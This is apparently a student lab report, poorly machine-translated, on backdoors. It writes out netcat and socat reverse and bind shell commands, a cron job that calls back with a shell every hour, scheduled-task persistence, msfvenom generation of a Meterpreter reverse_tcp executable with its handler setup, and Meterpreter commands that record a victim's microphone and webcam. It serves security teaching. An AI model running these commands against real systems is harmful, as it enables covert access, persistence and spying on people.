Experiment name
Principles and Practice back door.
Principle
Backdoor means to bypass security controls and procedures or methods to obtain access to the system through which you can bypass the normal certification path gain access to the system.
For the attacker, use the back door to invade a target host or server, an attacker must first have a program has backdoor functionality, and there are many such programs, including netcat series, Meterpreter, INTERSECT, and Windows Update and other; then to find ways to put backdoors into the target system, you can copy directly to U disk, phishing sites, and bind to attack legitimate software, send e-mail tools and violent attacks, the back door into the target system; the back door next to get to work, we must first back door up and running, which can be set to boot from the start, timed start the task, the associated start, etc., which can allow backdoor running on the target system, so you can perform all the permissions in the back door in the target host operating. In order to make sustainable use of the back door, you need anti-virus software from being removed (malicious code to avoid killing technology), but also to ensure the stability of the connection to avoid being blocked by the firewall (tunneling technology, encrypted connection, rebound connection).
Experimental purposes and requirements
· Grasp the concept of the back door, back door kind of common knowledge, in-depth understanding of the principles of operation of the back door.
· Master several common backdoor, backdoor learn to use tools for basic tasks.
Enhanced awareness of information security, recognizing the dangers of the back door, raise awareness of the back door.
NC or netcat
Also known as nc, ncat
Win obtain Linux Shell
In Windows uses ipconfigto view the local IP
In kali rebounded connected Windows, ncat 192.168.132.1 5322 -e /bin/sh, using the -eoption to perform shell program
Obtaining a linux shell under Windows, it can be run any command, such asls。
Linux to get the Windows shell
Linux-ended input ip addr get ip address is 192.168.181.129.
Open monitoring nc -l -p 4307。
In Windows rebound in connection kali,ncat.exe -e cmd.exe 192.168.181.129 4307
kali successful Windows command prompt:
meter Preter
- Is a backdoor program.
- The traditional understanding is: someone to write a backdoor, we make use of them.
- Later, some cattle do, wanted to write a platform to generate backdoors. This platform does, the back door
- Basic functions (basic connectivity, executing instructions),
- Extensions (such as collecting user information, installation services and other functions),
- Coding mode,
- Operating platform,
- And operating parameters
- Part or all made adjustable parameters. When used in combination as needed, you can generate an executable file.
Use netcat obtain host operating shell, cron start
crontab setting instructions to be executed periodically. In the Linux side:
Enter the crontab -e add a cron task area, select Edit 3
Add code 35 * * * * / bin / netcat in the last line of 192.168.181.1 4307 -e / bin / sh represents the first 35 minutes of every hour backlinks port Windows 5301 host, and then save and exit.
Arrival time windows ends at 20:35 when the verification.
Use socat get the host operating Shell, plans to start the task
socat ncat is an enhanced version of a two-way data transmission between relays the independent data channel. These files contain data channels, pipes, equipment, etc., the main feature is to establish the data flow between the two channels, and supports numerous protocols and link means such as ip, tcp, udp, ipv6 like.
On the Windows side socat download archive
In Windows, click [Computer] - [Management] - [] under [Task Scheduler Task Scheduler Library], [Select] to create a task
Create a trigger.
When completing the operation, adding "tcp-listen in to add parameters: 4307 exec: cmd.exe, pty, stderr command of this action is to cmd.exebind to port 5302, while the cmd.exe redirect the stderr to stdout
You can see the task is ready.
Pop up a cmd window and firewall settings at the time of 20:50, still allows access to select [], enter socat-tcp in Linux side: 192.168.181.1. Complete the connection, access to windows shell.
MSF meterpreter using an executable file using ncat transmitted to the host and the host operating acquired Shell
Use linux msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exegenerating backdoor
Program generates success.
linux use msfconsoleto enter msf console and type the following command:
Using the Monitor module, set the payload: use exploit / Multi / Handler
When used and generated backdoor same payload: SET payload Windows / Meterpreter / reverse_tcp
IP address of linux: the SET lhost 192.168 .132 .138
Using the same port: the SET LPORT 5322
Start listening: exploit
Use MSF meterpreter generated content acquisition target host audio, camera, keyloggers, etc., and try to put right
Connect step and continue
· Audio input command record_mic intercepted -d 15 seconds in a 15 kali terminal.
Enter the command webcam_snap use the camera to take pictures.
question answer
1. example you can think of possible ways to enter a backdoor on your system?
A: The back door is installed with pirated, cracked version of software.
2. How do you know exemplified the back door to start up (win and linux) way?
A: Linux: Crontab time to start; inject shellcode.
Windows: New Task Scheduler; modify a registry key setting backdoor from the start; user execution file with the back door.
Which gives you a deep mapping function 3.Meterpreter there?
A: The camera is able to control audio.
4. How do I find that they have the system has not been installed back door?
A: By some professional software to detect; see if there are unknown services; see if there is an unknown startup items.
Experimental thoughts
The experiment is not difficult, but achieved the effect is very shocked me, did not think so simple to get into other people's computers and get your screen shots and even video recording and so on, which makes me more aware of the importance of learning professional, I also realized that a variety of backdoor Trojan flooded the network, the Internet or download in the future will be more cautious, the importance of regular anti-virus and more attention.